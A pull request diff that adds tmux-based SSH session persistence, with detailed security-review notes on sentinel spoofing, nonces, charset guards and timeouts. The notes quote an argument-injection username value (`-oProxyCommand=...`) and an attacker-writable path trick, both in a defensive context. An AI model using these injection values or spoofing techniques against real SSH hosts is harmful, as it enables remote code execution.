### PR TITLE
feat(ssh): persistent remote sessions via tmux (#242)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -76,3 +76,8 @@ process-snapshot-*.txt
 # Any base64-wrapped cert/key blob (e.g. the `cert.b64` used to load a GitHub
 # secret — see docs/code-signing.md). Make those outside the repo; catch anyway.
 *.b64
+
+# Vitest transform cache. Per-checkout when vitest.config.ts sets cacheDir, so
+# worktrees sharing a junctioned node_modules cannot serve each other stale
+# transforms. Ignored unconditionally so a leftover dir can never be committed.
+.vite-cache/

--- a/CONTEXT.d/2026-08-08-242-round3-fastfollow.md
+++ b/CONTEXT.d/2026-08-08-242-round3-fastfollow.md
@@ -1,0 +1,105 @@
+## 2026-08-08 -- #242 fast-follow round 3: split-sentinel loss, unnonced latch, wire-path removal
+
+This fragment SUPERSEDES a stale claim in
+`CONTEXT.d/2026-08-08-242-ssh-tmux-persistence.md`: that entry says tier 1/2
+"keeps `isPinnedTmuxPath` as a validate-then-trust gate." As of this round
+that function does not exist. Tier 1/2 now pick the launch token from a
+fixed, host-side literal table (`ON_PATH_TMUX_BIN_EXPR` / `STAGED_TMUX_BIN_EXPR`
+in `ssh-tmux.ts`), keyed only by the CLASS (`path|home|none`) the setup
+sentinel reports -- never by a path read off the wire. Per CARP, the earlier
+fragment is not edited; this entry is the correction of record.
+
+Five findings closed this round, all in `pty-manager.ts` / `ssh-tmux.ts` /
+`ssh-shim.ts`:
+
+- **I1 (the one that mattered): a sentinel split across two PTY chunks
+  silently lost tmux persistence.** The `setup ok` completion latch used to
+  fire off a bare substring check against the CURRENT chunk alone; a real SSH
+  link routinely segments that line, so chunk 2 (carrying the resolved tmux
+  class) was never re-parsed once the latch had already fired on chunk 1.
+  Fails closed (bare launch, no wedge) but silently disabled the whole
+  feature on any link that segments the line. Fixed by mirroring the existing
+  `sshOscBuffers`/`extractSshOscSentinels` pattern: a per-session
+  `bufferSetupLine` accumulates the partial line, capped at 4096 bytes
+  (`MAX_SETUP_LINE_BUFFER`) so a remote that never emits a newline can't grow
+  it unbounded, cleared in `cleanupSessionResources` alongside the other
+  per-session maps. This fix has TWO call sites in `launchClaude`'s data
+  handler -- the host setup-ok latch (~line 1914) and the container/postCommand
+  setup-ok latch (~line 1935), which reruns the identical script with the
+  identical nonce and sentinel shape. Both are now covered: the host branch by
+  the pre-existing 'sentinel split across PTY chunks' describe block, the
+  container branch by a new test added this round
+  (`tests/unit/pty-manager-ssh-tmux.test.ts`, 'container-flow sentinel split
+  across PTY chunks') that drives the real container scaffolding
+  (spawnPty with postCommand -> inner-shell prompt -> launchClaude ->
+  writeContainerSetupCmd) and feeds the sentinel split mid-value across two
+  chunks. Mutation-proven: reverting the container call site's `combined =
+  bufferSetupLine(sessionId, data)` back to `combined = data` fails the new
+  test (claude write assertion: `expected undefined to be defined`) while
+  leaving the rest of the 4068-test suite green -- exactly the blind spot the
+  round-2 review flagged.
+- **I2: the setupDone latch was unnonced.** A write-only attacker (no tty
+  read access) could feed the literal string "setup ok" and latch completion
+  early with no usable tmux class ever recorded -- silently losing
+  persistence AND forcing an unwanted tier-3 staging attempt (network fetch +
+  write into `~/.claude/bin`) on a host that already had tmux. Fixed by
+  gating the completion latch on the SAME nonce-bearing match
+  `parseTmuxSentinel` already uses for the class read, instead of a separate
+  bare substring check.
+- **I3 (architectural): tier 1/2 no longer send or trust a wire path at
+  all.** `generateRemoteSetupScript` now emits a CLASS (`tmux=path|home|none`),
+  never a path. The launch token for tier 1 (`$(command -v tmux)`) and tier 2
+  (the same `STAGED_TMUX_BIN_EXPR` tier 3/4 already used) is picked from a
+  fixed, host-side literal table keyed only by that class -- both resolve in
+  the authenticated user's own remote shell, so nothing off the wire reaches
+  the launch-command sink. This makes the previous defense-in-depth-only path
+  validation obsolete, so it was deleted rather than left as dead code:
+  `isPinnedTmuxPath`, `assertPinnedTmuxPath` and `assertSafeTmuxBin` -- all
+  three module-private in `ssh-tmux.ts` -- along with their unit tests. Only
+  historical doc-comments referencing the old names remain, explaining why
+  they're gone.
+
+  (An earlier commit body on this branch placed `assertSafeTmuxBin` in
+  `ssh-tmux-stage.ts`. It was in `ssh-tmux.ts` with the other two. That commit
+  no longer exists -- the branch was squashed before the rebase below -- so this
+  line survives only to stop the same misattribution being re-derived from the
+  doc-comments that still name the deleted helpers.)
+- **I1 was only HALF closed on the first attempt, and the review caught it.**
+  The buffer was applied to the two setup-ok latches only, leaving the tier-3/4
+  stage sentinel and the tier-4 arch probe still parsing the raw chunk -- so the
+  bug stayed live on exactly the tiers a tmux-less remote depends on, which is
+  what a desktop test against a real remote exercises. Proven by driving the
+  real flow: a split `ok path=` never resolves and the flow stalls to the 20s
+  STAGE_TIMEOUT before silently falling back to a bare launch; a split arch
+  probe leaves detectedArch null, making tier 4 unreachable on any segmenting
+  link. All four sentinel sites now parse accumulated text.
+
+  Each sentinel kind gets its OWN buffer, because the arch probe and the stage
+  result are emitted by the same remote fragment and can interleave -- sharing
+  one buffer would let whichever resolved first discard the other's partial
+  line. Tier 4 deliberately reuses the 'stage' buffer, since it only runs after
+  tier 3 resolved and cleared it and both emit the identical sentinel shape.
+
+  The lesson worth keeping: every existing test fed its sentinel as ONE chunk,
+  so the whole class was invisible to a green suite. A parser that reads from a
+  stream needs at least one test that splits its input at a hostile boundary,
+  or it is only ever tested against the happy framing.
+- **I4: `buildTmuxBinPatchCommand`'s `CCC_TMUX_BIN` splice had no charset
+  guard**, unlike its sibling in `generateRemoteSetupScript` which re-checks
+  the identical class of value (`os.homedir()`-derived, not wire-controlled,
+  but still a potential space/shell-metacharacter source) against
+  `/^[A-Za-z0-9_./-]+$/` right before the same `statusLine.command` sink.
+  Fixed by applying the same guard remotely and skipping the whole patch
+  (leaving the statusline unset) rather than splicing a broken value in.
+- **I5: the tier-3 stage sentinel's path/reason captures were uncapped**
+  (`\S+`). I3 removed the tier-1/2 wire capture entirely, so this only
+  applied to the still-present tier-3 stage sentinel capture in
+  `parseTmuxStageSentinel` -- now bounded to `\S{1,4096}`
+  (`MAX_TMUX_STAGE_CAPTURE_LEN`), charset-safe so not injection, but a
+  multi-kilobyte value was resource/log noise regardless.
+
+Full suite green (448 files / 4068 tests) and typecheck clean after this
+round. Not desktop-tested against a real remote yet -- I1 was blocking that
+test (a real SSH link segmenting the sentinel line would have made the test
+report "tmux persistence is broken" when the ladder was fine, or silently
+never engage tmux while appearing to pass); that blocker is now closed.

--- a/CONTEXT.d/2026-08-08-242-ssh-tmux-persistence.md
+++ b/CONTEXT.d/2026-08-08-242-ssh-tmux-persistence.md
@@ -1,0 +1,178 @@
+## 2026-08-08 -- Five-tier SSH tmux persistence; the loop's COMMIT GATING did not catch what its review did (#242)
+
+Landed a five-tier ladder for keeping a remote `claude` session alive across SSH drops: tier
+1/2 detect an existing tmux/`~/.claude/bin` and launch straight into it; tier 3 has the
+remote curl/wget its own tmux binary when neither is found; tier 4 pushes a pre-downloaded,
+sha256-verified archive down the live PTY as base64 when the remote has no egress for tier
+3's curl; tier 5 carries `--continue` across a reconnect so a respawned session doesn't lose
+context. `ssh-shim.ts`, `pty-manager.ts`, `ssh-tmux-stage.ts` and the matching unit tests are
+the diff.
+
+Not selling this as a clean five-for-five. Tiers 3 and 4 were each REJECTED three times by
+review before this branch -- and still ended up committed anyway, not because they earned
+acceptance on attempt four, but because an orchestration bug in the loop advanced the commit
+step regardless of the review verdict. The gating that was supposed to block a commit on a
+REJECTED verdict did not fire. That is the fact worth keeping: the adversarial review did its
+job and caught real, dangerous defects; the mechanism meant to act on that verdict did not.
+
+Three of the findings from that review were not stylistic:
+
+- **Unbounded download wedged the session.** `downloadAndCacheTmuxArchive` (tier 4) had no
+  timeout on the HTTPS request or its redirect hop, and no cap on the response body. A
+  stalled connection or a hostile/misbehaving host serving an unbounded body left the flow
+  with no way out -- `attemptTmuxPush`'s own doc comment had promised tier 4 would never be
+  "a NEW way for the flow to get stuck with claude never launched," and this broke exactly
+  that promise. Fixed with a 20s per-request timeout (both hops), a 45s download-phase
+  ceiling armed the instant the push attempt starts, and an 8 MB cap checked on the wire in
+  the `data` handler (`res.destroy()`, not `resume()`, so the socket actually stops).
+
+- **An unterminated single quote swallowed the recovery write and the claude fallback.**
+  When a tier-4 push aborts mid-transfer, the last bytes actually delivered can be an
+  arbitrary mid-line slice of an `echo '<base64...` chunk -- the opening quote landed, the
+  closing one did not, so the remote shell's line discipline is sitting inside a still-open
+  string. Writing the recovery text (restore echo, drop the partial file) straight after that
+  became literal content inside the open quote, and so did `writeClaudeCmd`'s `claude
+  ...\r` a moment later: the session hangs at a `>` continuation prompt with echo still off,
+  instead of falling through to the bare launch it was supposed to guarantee. Fixed by
+  sending `\x03` (Ctrl-C) as its own write FIRST, so the remote discards the dangling partial
+  line before the recovery command is ever typed.
+
+- **A staging timer outlived teardown and wrote into a killed PTY.** `stagingTimeoutHandle`
+  was the one timer on the ladder never cleared in `destroy()`. Unguarded, it fired after
+  session teardown and drove a full claude-launch write into a PTY that `destroy()` had
+  already torn down -- proved empirically by the reviewer's probe logging "WRITES AFTER
+  DESTROY" from exactly this timer. `pushTimeoutHandle` and the new `downloadTimeoutHandle`
+  had the identical unguarded shape. Fixed two ways: a `destroyed` flag flipped at the TOP of
+  `destroy()` so any write callback still reachable bails before ever touching `ptyProcess`,
+  and all three timer handles now cleared in `destroy()` alongside the two that already were.
+
+Two of these three (the unterminated quote and the leaked staging timer) could kill the
+Electron main process outright, not just wedge a session -- a write into a torn-down PTY or
+an unhandled state after `destroy()` are exactly the shape that turns into an uncaught
+exception on main, not merely a stuck remote shell.
+
+Smaller findings closed in the same pass, for completeness: the tier-3 remote curl URL and
+the tier-4 host-side download URL were built from independently-typed literals that could
+silently drift apart (F6) -- now share one set of constants
+(`tmuxStageAssetUrl`/`tmuxReleaseBaseUrl` in `ssh-tmux-stage.ts`); a doc comment on both
+`ssh-shim.ts` and `ssh-tmux-stage.ts` claimed `stty -echo` hides the base64/setup-script
+line's OWN echo, which is false (it's the first statement of that same line, so the tty has
+already echoed the whole thing by the time it takes effect) -- corrected in place, with the
+real protection (base64 opacity) stated instead (F7); and a sink-side charset guard now runs
+on `TMUX_STAGE_TAG`/`TMUX_STAGE_SHA256`/`TMUX_STAGE_SENTINEL_PREFIX` before they're
+interpolated into remote shell text or a `RegExp` constructor, in case a future edit widens
+any of them to a configurable or remote-derived value (F8).
+
+Gate: unit tests and typecheck run clean on this branch (`npx vitest run --no-cache`,
+`npm run typecheck`). Not desktop-tested against a real remote exercising tier 3 or tier 4 --
+that remains the acceptance check, same caveat as #241's ControlMaster fix.
+
+ADR-009 adversarial review (round 5), run before this branch's tier-3/4 path handling
+landed, found a BLOCKER: a remote able only to WRITE BYTES TO THE TTY -- no shell, no
+filesystem access beyond what its own SSH session already has -- could spoof the "setup
+ok"/stage-sentinel line CCC's PTY parser reads back. The gate on that sentinel's path field
+was charset-only (`isSafeTmuxBin`) plus a suffix check (`isPinnedTmuxPath`, "ends with
+/.claude/bin/tmux") -- satisfiable from an attacker-writable directory (`mkdir -p
+/tmp/.claude/bin`), with no nonce and no provenance check tying the line back to this
+session's actual spawn. A spoofed sentinel reporting that attacker-controlled path would
+have had `buildTmuxLaunchCommand` wrap the claude launch around it: CCC executing a binary
+of the remote SSH user's choosing, not the tool it thinks it staged.
+
+Closed with path-pinning as the durable control: for a staged tier (3/4),
+`buildTmuxLaunchCommand` no longer reads the wire-reported path at all -- it always embeds a
+fixed, host-authored `"$HOME"/.claude/bin/tmux` literal (`STAGED_TMUX_BIN_EXPR`), expanded by
+the remote shell itself, so there is no attacker-controllable operand in the sink for that
+tier. Tier 1/2 (detecting a pre-existing tmux, which by definition can be anywhere) keeps
+`isPinnedTmuxPath` as a validate-then-trust gate, with its doc comment corrected to stop
+claiming the ends-with check proves the path is really under $HOME -- it doesn't; it only
+keeps garbage out of logs. A per-session nonce (host-generated via `randomId()`, baked into
+every setup/stage/push script, required immediately after the sentinel prefix on every
+parse) is the second layer, documented plainly as defeated by a tty-READER, since the
+nonce's own echo is not suppressed and can be copied verbatim. The BLOCKER's threat model is
+a tty-WRITER, so the nonce narrows that window; the path-pin is what actually holds.
+
+Two MAJORs closed in the same pass:
+
+- F2: `sessionIdSchema` (pty-handlers.ts) had no charset guard, even though `sessionId`
+  reaches `ssh-shim.ts`'s `statusLine.command` -- a string `sh -c`'d on every statusline
+  refresh -- while the other fields on the same IPC surface (`effortLevel`, `model`) already
+  had one. Fixed with `.regex(/^[A-Za-z0-9_-]+$/)`; real ids (`randomId()`'s 24
+  lowercase-hex chars) already satisfy it, so the guard only ever rejects something a real
+  id could never be.
+- F3: `buildTmuxBinPatchCommand` (the follow-up write that patches `CCC_TMUX_BIN` into the
+  already-written settings file after a stage/push `ok`) took a `tmuxBin` parameter sourced
+  from that same remote-reported path -- so even after the launch-command sink stopped
+  trusting it (F1a), this second call site would have baked the spoofed path into the
+  settings file, reopening the identical hole one level down. Fixed the same way: the patch
+  script computes the fixed path itself, remotely, via `os.homedir()`.
+
+Gate on the round-5 fixes: unit tests and typecheck clean. Not desktop-tested against a real
+remote exercising tier 3/4 with a hostile tty-writer present -- same caveat as above.
+
+## 2026-08-13 -- rebased onto beta (2.1.0-beta.9); #241 was superseded upstream
+
+The branch sat for five days while `beta` moved 26 commits. Two things had changed
+underneath it.
+
+**#241 was implemented upstream, independently, while this branch was out.** Commit
+370c16d2 ("beta.9 quick wins") carries `fix(ssh): force ControlMaster/ControlPath off for
+win32 ssh sessions (#241)` and cites the issue. The maintainer arrived at the same design
+-- a new pure `src/main/ssh-args.ts`, win32-only `-o ControlMaster=no -o ControlPath=none`
+-- so the three commits on this branch's `fix/241-...` base were dropped in the rebase
+rather than replayed. Nothing was lost that upstream does not already have, because
+nothing had been pushed.
+
+What upstream's version does NOT carry is the hardening the #241 adversarial pass added on
+top, and that is still a live gap on `beta`:
+
+- `host` / `username` are still `z.string().min(1)` at the IPC boundary, with no charset
+  gate, so an option-like username (`-oProxyCommand=...`) still reaches argv[0]. The
+  exploit does not complete today only because consuming argv[0] leaves ssh with no
+  destination -- an accident of the argv shape, not a control.
+- `buildSshArgs` has no sink-side guard at all.
+- `sessionIdSchema` is still `z.string().min(1).max(200)` with no charset regex.
+- No test pins that pty-manager actually CALLS the builder, so a revert to an inline argv
+  array would keep the suite green.
+
+That work needs its own issue and its own branch off `beta`; it is deliberately NOT folded
+into this one. #242 carries only the sessionId half (finding F2), because the tmux
+statusline sink forced it.
+
+**The rebase itself.** Nine reviewed commits were squashed to one first: replaying them
+individually meant resolving `pty-manager.ts` nine times against 26 upstream commits, with
+intermediate states that would not build. Six conflict hunks in three files, all
+mechanical -- `ssh-args.ts` auto-merged cleanly, folding this branch's `ServerAlive*`
+additions into upstream's `buildSshArgs` signature.
+
+Two upstream changes had to be absorbed into this branch's tests rather than merged: the
+per-session MCP token (`mcpSessionToken`, GHSA-q83v) now needs stubbing in the statusline
+test's mock, and the remote settings/mcp writes gained `{mode:0o600,flag:'wx'}` exclusive
+create (GHSA-phr3-g5qh-q4v5), which the shim tests assert on.
+
+Gate after rebase: 4367 unit tests pass, typecheck clean, changelog in sync. Still never
+desktop-tested against a real remote -- that remains the standing acceptance gate.
+
+## 2026-08-17 -- rebased again onto beta.12; #265 now merged upstream too
+
+Second rebase, beta having moved another 118 commits to 2.1.0-beta.12. The notable change:
+**#265 -- the SSH-argv hardening this branch's own adversarial pass surfaced -- was implemented
+upstream** (f8e0cc46, "harden the SSH argv boundary … (#265)"), the same pattern as #241. So for
+the second time our filed issue landed via the maintainer while our branch was out.
+
+That put upstream's #265 and this branch's #242-F2 on a collision course, and they had converged on
+the *same* fix: `sessionIdSchema` gained an identical `/^[A-Za-z0-9_-]+$/` regex on both sides, and
+`ssh-shim.ts`'s statusLine command switched to `safeSid` on both sides. Resolution kept upstream's
+version of each (its comments are the canonical #265 reference) while preserving the one piece only
+#242 has: the `CCC_TMUX_BIN=<tmuxPath>` bake-in in that same statusLine command (F3), which the
+tmux statusline needs. Net: no #242 security work was lost, and the duplicate sessionId guard
+collapsed to one.
+
+Also absorbed two upstream hardening changes into #242's tests: the remote shim write gained
+`{mode:0o755,flag:'wx'}` + an `rmSync` prefix (GHSA-phr3-g5qh-q4v5), so the runtime-harness's shim
+extractor now matches that shape; and two upstream #265 tests asserted the pre-tmux `<sid> node`
+adjacency in the statusLine command, updated to allow the `CCC_TMUX_BIN=` insertion between.
+
+The worktree's junctioned node_modules was too stale for beta.12 (missing axe-core /
+dom-accessibility-api, added by the Agent Canvas work), so it was replaced with a real per-worktree
+`npm ci`. Gate after rebase: typecheck clean (3 tsconfigs), 5552 unit tests pass, changelog in sync.
+Still never desktop-tested against a real remote -- that remains the standing acceptance gate.

--- a/src/main/ipc/pty-handlers.ts
+++ b/src/main/ipc/pty-handlers.ts
@@ -18,6 +18,12 @@ interface RendererSSHOptions {
   username: string
   remotePath: string
   postCommand?: string
+  /** #242 tier 5: true when this spawn respawns a session that had
+   *  previously reached claude-running -- set by the renderer session
+   *  store (Session.sshReachedClaudeRunning, never persisted). Forwarded
+   *  verbatim into SSHOptions.reconnect; see its doc comment in
+   *  pty-manager.ts for how it's consumed. */
+  reconnect?: boolean
 }
 
 // host/username are fused into `${username}@${host}` and handed to ssh as
@@ -40,6 +46,7 @@ const sshSchema = z.object({
   // (adversarial review, #188).
   remotePath: z.string().min(1).regex(/^[~A-Za-z0-9_./-]+$/, 'remote path has invalid characters'),
   postCommand: z.string().optional(),
+  reconnect: z.boolean().optional(),
 }).optional()
 
 export const spawnOptionsSchema = z.object({
@@ -185,12 +192,14 @@ export const spawnOptionsSchema = z.object({
   }
 }).optional()
 
-// Charset-gate the session id (#265). It is interpolated into the remote setup
-// script (base64'd and piped to `node` on the remote) and into filenames on the
-// remote. Real ids are CSPRNG hex (src/shared/id.ts), so this only ever rejects
-// a caller that already controls the renderer or local config — a defence-in-depth
-// gate, not an embargoed bug. ssh-shim re-sanitises via safeSid as a backstop.
-// Exported so the boundary contract is unit-tested against the real schema.
+// Charset-gate the session id (#265; independently reached by #242 F2). It is
+// interpolated into the remote setup script (base64'd and piped to `node` on the
+// remote), into filenames on the remote, and into ssh-shim's statusLine.command
+// (a string Claude runs via `sh -c` on every statusline refresh). Real ids are
+// CSPRNG hex (src/shared/id.ts), so this only ever rejects a caller that already
+// controls the renderer or local config — a defence-in-depth gate, not an
+// embargoed bug. ssh-shim re-sanitises via safeSid as a backstop. Exported so the
+// boundary contract is unit-tested against the real schema.
 export const sessionIdSchema = z.string().min(1).max(200).regex(/^[A-Za-z0-9_-]+$/, 'session id has invalid characters')
 
 export function registerPtyHandlers(getWindow: () => BrowserWindow | null): void {

--- a/src/main/providers/claude/index.ts
+++ b/src/main/providers/claude/index.ts
@@ -52,9 +52,10 @@ export class ClaudeProvider implements SshCapableProvider {
     sessionId: string,
     remotePath: string,
     hooksConfig: { port: number; secret: string } | null,
-    opts?: { includeStatusLine?: boolean; includeConductorMcp?: boolean },
+    opts: { includeStatusLine?: boolean; includeConductorMcp?: boolean } | undefined,
+    nonce: string,
   ): string {
-    return getRemoteSetupCommand(sessionId, remotePath, hooksConfig, opts)
+    return getRemoteSetupCommand(sessionId, remotePath, hooksConfig, opts, nonce)
   }
   async deployStatuslineScript(resourcesDir: string): Promise<void> {
     return deployClaudeStatuslineScript(resourcesDir)

--- a/src/main/providers/claude/ssh-shim.ts
+++ b/src/main/providers/claude/ssh-shim.ts
@@ -25,22 +25,67 @@ import { buildHooksBlock } from '../../hooks/session-hooks-writer'
 // doesn't expose `extra_usage`, so SSH statuslines no longer show the extra
 // top-up bar (local sessions still do). Re-add via API later if needed.
 // Fallback order for the OSC sentinel (first that succeeds wins):
-//   1. /dev/tty — the controlling terminal. Correct when it exists, but Claude
-//      runs the statusLine command as a DETACHED child (via `sh -c`), so that
-//      child has NO controlling terminal and this fails with ENXIO over SSH.
-//   2. Ancestor pts — walk the process tree for the /dev/pts/N slave that an
+//   1. tmux client tty (#242) — checked FIRST, ahead of /dev/tty below.
+//      Under tmux, EVERY device this shim's own process tree can reach --
+//      /dev/tty (case 2) and the ancestor-pts walk (case 3) alike -- is the
+//      pane's pty, because that pane pty IS this process's (detached)
+//      controlling context; tmux swallows an unrecognised OSC written there
+//      instead of forwarding it to the attached client. Neither fallback
+//      below can ever reach the outer ssh PTY once $TMUX is set, so tmux
+//      must be tried first, not because /dev/tty would falsely "succeed"
+//      but because it and the pts walk both land on the wrong pty entirely.
+//      Ask the tmux SERVER for `#{client_tty}` — the device path of the tty
+//      the ATTACHED CLIENT (the outer ssh session) is on — and write the
+//      sentinel straight there, bypassing the pane pty and any tmux
+//      forwarding entirely. tmuxBin comes from $CCC_TMUX_BIN, baked into the
+//      statusLine command by generateRemoteSetupScript from the tier-1/2
+//      probe result — tmux is NOT assumed to be on PATH (tiers 2+ stage it
+//      under ~/.claude/bin). CCC_TMUX_BIN is allowlist-guarded at the point
+//      generateRemoteSetupScript bakes it in (see the `tmuxPath` guard
+//      there, mirroring SAFE_TMUX_BIN_RE in ssh-tmux.ts) — this shim can
+//      trust the value it's handed. Empty `#{client_tty}` output means the
+//      tmux session is detached (no attached client) — nothing to display,
+//      so skip the write rather than fail. `ok` is set true on this branch
+//      too (adversarial review round 5, #242 M7 fix): the prior version left
+//      `ok` false here, so a detached session fell through to /dev/tty then
+//      the ancestor-pts walk below — the latter usually lands on the PANE
+//      pty (which still exists even with no attached client) and succeeds,
+//      logging a `pts-ok` "success" for a sentinel nobody is attached to
+//      ever see. Marking this handled prevents that false-positive trace.
+//      The `display-message` call carries a 2s timeout: a hung or half-dead
+//      tmux server must not stall the statusLine child indefinitely on
+//      every refresh -- a timeout kill throws, which the catch below turns
+//      into a `tmux-fail` trace line same as any other failure. See the
+//      decision note on buildTmuxLaunchCommand in ssh-tmux.ts.
+//      `tty` itself is validated before the write (adversarial review round
+//      5, #242 M1): must be an absolute path under `/dev/` AND an actual
+//      character device (fs.statSync().isCharacterDevice()) — `tmux
+//      display-message` is trusted output from a binary this app itself
+//      staged/resolved, not remote-attacker input, but fs.writeFileSync on
+//      an arbitrary returned path would otherwise CREATE or TRUNCATE a
+//      regular file if that trust were ever misplaced (a future tmux
+//      version, a wrapper script, a malformed `#{client_tty}` expansion).
+//   2. /dev/tty — the controlling terminal. Correct outside tmux, but Claude
+//      runs the statusLine command as a DETACHED child (via `sh -c`), so
+//      that child usually has NO controlling terminal and this fails with
+//      ENXIO over a plain (non-tmux) SSH session.
+//   3. Ancestor pts — walk the process tree for the /dev/pts/N slave that an
 //      ancestor (claude itself) holds on one of its fds, and write the sentinel
 //      to that device. Writing the pts slave sends bytes toward the master →
 //      sshd → local, i.e. it reaches the ssh PTY and the local OSC parser. This
-//      is the path that actually works over SSH. Linux-only (needs /proc).
-//   3. stderr — last resort. NOTE: over SSH, Claude captures the child's stderr
+//      is the path that actually works over SSH (outside tmux). Linux-only
+//      (needs /proc). Also serves as a fallback if tier 1 has no
+//      $CCC_TMUX_BIN or the tmux server call fails (under tmux this still
+//      lands on the pane pty, which tmux swallows, but it costs nothing to try).
+//   4. stderr — last resort. NOTE: over SSH, Claude captures the child's stderr
 //      on a pipe, so this typically does NOT reach the local PTY (that is why
 //      the pre-fix shim, which relied on it, never showed a statusline). Kept
 //      only for environments where the child's stderr is inherited.
-//   4. Append a trace line to ~/.claude/conductor-shim.log on every path
-//      (tty-fail / pts-ok / pts-fail / pts-none / stderr-fallback) so "no
-//      statusline ever appeared" stays diagnosable without guesswork. The log
-//      is capped via append-and-forget; grows slowly.
+//   5. Append a trace line to ~/.claude/conductor-shim.log on every path
+//      (tmux-clienttty-ok / tmux-detached / tmux-fail / tty-fail / pts-ok /
+//      pts-fail / pts-none / stderr-fallback) so "no statusline ever
+//      appeared" stays diagnosable without guesswork. The log is capped via
+//      append-and-forget; grows slowly.
 const SSH_STATUSLINE_SHIM = `#!/usr/bin/env node
 const fs=require('fs'),os=require('os'),path=require('path');
 const logPath=path.join(os.homedir(),'.claude','conductor-shim.log');
@@ -68,7 +113,8 @@ if(rl.five_hour){s.rateLimitCurrent=Math.round(Number(rl.five_hour.used_percenta
 if(rl.seven_day){s.rateLimitWeekly=Math.round(Number(rl.seven_day.used_percentage)||0);s.rateLimitWeeklyResets=iso(rl.seven_day.resets_at);}
 const sentinel='\\x1b]9999;CMSTATUS='+JSON.stringify(s)+'\\x07';
 let ok=false;
-try{fs.writeFileSync('/dev/tty',sentinel);ok=true;}catch(e){trace('tty-fail sid='+sid+' err='+(e&&e.code||e.message||'unknown'));}
+if(process.env.TMUX){const tb=process.env.CCC_TMUX_BIN||'';if(tb){try{const out=require('child_process').execFileSync(tb,['display-message','-p','#{client_tty}'],{encoding:'utf8',timeout:2000});const tty=out.split('\\n')[0].trim();if(tty){try{if(tty.indexOf('/dev/')!==0)throw new Error('not-under-dev');if(!fs.statSync(tty).isCharacterDevice())throw new Error('not-a-chardev');fs.writeFileSync(tty,sentinel);ok=true;trace('tmux-clienttty-ok sid='+sid+' dev='+tty);}catch(e4){trace('tmux-fail sid='+sid+' dev='+tty+' err='+(e4&&e4.code||e4.message||'unknown'));}}else{ok=true;trace('tmux-detached sid='+sid);}}catch(e5){trace('tmux-fail sid='+sid+' err='+(e5&&e5.code||e5.message||'unknown'));}}else{trace('tmux-fail sid='+sid+' err=no-ccc-tmux-bin');}}
+if(!ok){try{fs.writeFileSync('/dev/tty',sentinel);ok=true;}catch(e){trace('tty-fail sid='+sid+' err='+(e&&e.code||e.message||'unknown'));}}
 if(!ok){const pts=findPty();if(pts){try{fs.writeFileSync(pts,sentinel);ok=true;trace('pts-ok sid='+sid+' dev='+pts);}catch(e2){trace('pts-fail sid='+sid+' dev='+pts+' err='+(e2&&e2.code||e2.message||'unknown'));}}else{trace('pts-none sid='+sid);}}
 if(!ok){try{process.stderr.write(sentinel);trace('stderr-fallback sid='+sid);}catch(e3){trace('stderr-fail sid='+sid+' err='+(e3&&e3.message||'unknown'));}}
 process.stdout.write(' ');
@@ -88,8 +134,22 @@ process.stdout.write(' ');
 export function generateRemoteSetupScript(
   sessionId: string,
   hooksConfig: { port: number; secret: string } | null,
-  opts?: { includeStatusLine?: boolean; includeConductorMcp?: boolean },
+  opts: { includeStatusLine?: boolean; includeConductorMcp?: boolean } | undefined,
+  nonce: string,
 ): string {
+  // #242 finding F1 (b): the `setup ok` sentinel this script emits (bottom
+  // of `lines`, below) MUST carry `nonce` -- required, not optional, so a
+  // future call site cannot silently regress to the pre-nonce sentinel shape
+  // by omitting the argument. Charset-guarded before interpolation into the
+  // remote-facing script text, same reasoning as assertSafeNonce
+  // (ssh-tmux-stage.ts) — this whole script runs under `2>/dev/null`
+  // (getRemoteSetupCommand), so a thrown error here silently aborts setup
+  // rather than crashing anything; that is an acceptable fail-closed
+  // degrade for a nonce this app itself generated and should never be
+  // malformed in production.
+  if (!/^[A-Za-z0-9]+$/.test(nonce)) {
+    throw new Error(`generateRemoteSetupScript: nonce "${nonce}" fails the charset guard (expected [A-Za-z0-9]+).`)
+  }
   const { includeStatusLine = true, includeConductorMcp = true } = opts ?? {}
   // Conductor MCP server is always running (independent of browser/vision config),
   // so SSH sessions always get the conductor MCP entry pointing at the
@@ -151,17 +211,34 @@ export function generateRemoteSetupScript(
     : JSON.stringify({ mcpServers: {} })
   // Master status-line switch: with it off, the per-session clone simply gets
   // no statusLine key (the shim file is still staged but inert without it).
+  //
+  // CCC_TMUX_BIN is baked in alongside CLAUDE_MULTI_SESSION_ID so the shim's
+  // $TMUX branch (SSH_STATUSLINE_SHIM above) can reach the tmux server
+  // without assuming `tmux` is on PATH (tiers 2+ stage it under
+  // ~/.claude/bin, which a pane's shell may not have on PATH). `tmuxPath` is
+  // a REMOTE-side variable, not a TS value -- the tier-1/2 probe only runs
+  // once the generated script executes on the target host, so this is
+  // string concatenation (`+tmuxPath+`) baked into the emitted source, the
+  // same trick already used for `+shimPath` below. That means the probe
+  // (declared further down in `lines`) must run BEFORE this statement, so
+  // it is placed immediately after the shim is written, ahead of the
+  // sesCfg build.
   const sesCfgParts: string[] = []
   if (includeStatusLine) {
-    // Use safeSid, not the raw sessionId (#265): this value is embedded in a
-    // single-quoted JS string literal inside the setup script AND becomes the
-    // `command` claude later runs via `sh -c`. A raw id bearing a quote/space/
-    // metacharacter would break out of the literal (remote code execution) or
-    // split the command. The IPC boundary already charset-gates the id; this is
-    // the sink-side backstop, and a no-op for real (hex) ids. Every OTHER
-    // embedding is already neutralised — the URL via encodeURIComponent, the
-    // filenames via safeSid — so this was the last raw path.
-    sesCfgParts.push(`statusLine:{type:'command',command:'CLAUDE_MULTI_SESSION_ID=${safeSid} node '+shimPath}`)
+    // Use safeSid, not the raw sessionId (#265; independently reached by #242
+    // F2): this value is embedded in a single-quoted JS string literal inside
+    // the setup script AND becomes the `command` claude later runs via `sh -c`.
+    // A raw id bearing a quote/space/metacharacter would break out of the literal
+    // (remote code execution) or split the command. The IPC boundary already
+    // charset-gates the id; this is the sink-side backstop, and a no-op for real
+    // (hex) ids. Every OTHER embedding is already neutralised — the URL via
+    // encodeURIComponent, the filenames via safeSid — so this was the last raw path.
+    //
+    // #242 F3: CCC_TMUX_BIN='+tmuxPath+' is baked in so the statusline shim can
+    // find the tmux binary under a persistent session. tmuxPath is the tier-1/2
+    // probe result (empty when none); after a tier-3/4 stage succeeds it is
+    // rewritten by buildTmuxBinPatchCommand. tmuxPath is charset-guarded upstream.
+    sesCfgParts.push(`statusLine:{type:'command',command:'CLAUDE_MULTI_SESSION_ID=${safeSid} CCC_TMUX_BIN='+tmuxPath+' node '+shimPath}`)
   }
